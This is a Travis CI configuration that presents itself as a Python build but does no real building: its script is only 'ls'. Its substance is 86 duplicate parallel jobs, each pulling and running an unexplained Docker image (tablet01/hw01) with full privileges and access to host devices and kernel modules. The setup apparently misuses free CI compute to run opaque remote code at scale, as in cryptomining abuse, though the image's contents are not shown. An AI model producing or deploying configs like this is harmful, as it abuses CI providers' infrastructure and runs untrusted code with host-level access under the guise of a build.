language: python
matrix:
  include:
  - name: "job 1"
    python: "3.6"
  - name: "job 2"
    python: "3.6"
  - name: "job 3"
    python: "3.6"
  - name: "job 4"
    python: "3.6"
  - name: "job 5"
    python: "3.6"
  - name: "job 6"
    python: "3.6"
  - name: "job 7"
    python: "3.6"
  - name: "job 8"
    python: "3.6"
  - name: "job 9"
    python: "3.6"
  - name: "job 10"
    python: "3.6"
  - name: "job 11"
    python: "3.6"
  - name: "job 12"
    python: "3.6"
  - name: "job 13"
    python: "3.6"
  - name: "job 14"
    python: "3.6"
  - name: "job 15"
    python: "3.6"
  - name: "job 16"
    python: "3.6"
  - name: "job 17"
    python: "3.6"
  - name: "job 18"
    python: "3.6"
  - name: "job 19"
    python: "3.6"
  - name: "job 20"
    python: "3.6"
  - name: "job 21"
    python: "3.6"
  - name: "job 22"
    python: "3.6"
  - name: "job 23"
    python: "3.6"
  - name: "job 24"
    python: "3.6"
  - name: "job 25"
    python: "3.6"
  - name: "job 26"
    python: "3.6"
  - name: "job 27"
    python: "3.6"
  - name: "job 28"
    python: "3.6"
  - name: "job 29"
    python: "3.6"
  - name: "job 30"
    python: "3.6"
  - name: "job 31"
    python: "3.6"
  - name: "job 32"
    python: "3.6"
  - name: "job 33"
    python: "3.6"
  - name: "job 34"
    python: "3.6"
  - name: "job 35"
    python: "3.6"
  - name: "job 36"
    python: "3.6"
  - name: "job 37"
    python: "3.6"
  - name: "job 38"
    python: "3.6"
  - name: "job 39"
    python: "3.6"
  - name: "job 40"
    python: "3.6"
  - name: "job 41"
    python: "3.6"
  - name: "job 42"
    python: "3.6"
  - name: "job 43"
    python: "3.6"
  - name: "job 44"
    python: "3.6"
  - name: "job 45"
    python: "3.6"
  - name: "job 46"
    python: "3.6"
  - name: "job 47"
    python: "3.6"
  - name: "job 48"
    python: "3.6"
  - name: "job 49"
    python: "3.6"
  - name: "job 50"
    python: "3.6"
  - name: "job 51"
    python: "3.6"
  - name: "job 52"
    python: "3.6"
  - name: "job 53"
    python: "3.6"
  - name: "job 54"
    python: "3.6"
  - name: "job 55"
    python: "3.6"
  - name: "job 56"
    python: "3.6"
  - name: "job 57"
    python: "3.6"
  - name: "job 58"
    python: "3.6"
  - name: "job 59"
    python: "3.6"
  - name: "job 60"
    python: "3.6"
  - name: "job 61"
    python: "3.6"
  - name: "job 62"
    python: "3.6"
  - name: "job 63"
    python: "3.6"
  - name: "job 64"
    python: "3.6"
  - name: "job 65"
    python: "3.6"
  - name: "job 66"
    python: "3.6"
  - name: "job 67"
    python: "3.6"
  - name: "job 68"
    python: "3.6"
  - name: "job 69"
    python: "3.6"
  - name: "job 70"
    python: "3.6"
  - name: "job 71"
    python: "3.6"
  - name: "job 72"
    python: "3.6"
  - name: "job 73"
    python: "3.6"
  - name: "job 74"
    python: "3.6"
  - name: "job 75"
    python: "3.6"
  - name: "job 76"
    python: "3.6"
  - name: "job 77"
    python: "3.6"
  - name: "job 78"
    python: "3.6"
  - name: "job 79"
    python: "3.6"
  - name: "job 80"
    python: "3.6"
  - name: "job 81"
    python: "3.6"
  - name: "job 82"
    python: "3.6"
  - name: "job 83"
    python: "3.6"
  - name: "job 84"
    python: "3.6"
  - name: "job 85"
    python: "3.6"
  - name: "job 86"
    python: "3.6"

services:
  - docker

before_install:
- docker run --privileged --cap-add=ALL -v /dev:/dev -v /lib/modules:/lib/modules tablet01/hw01

script:
- ls
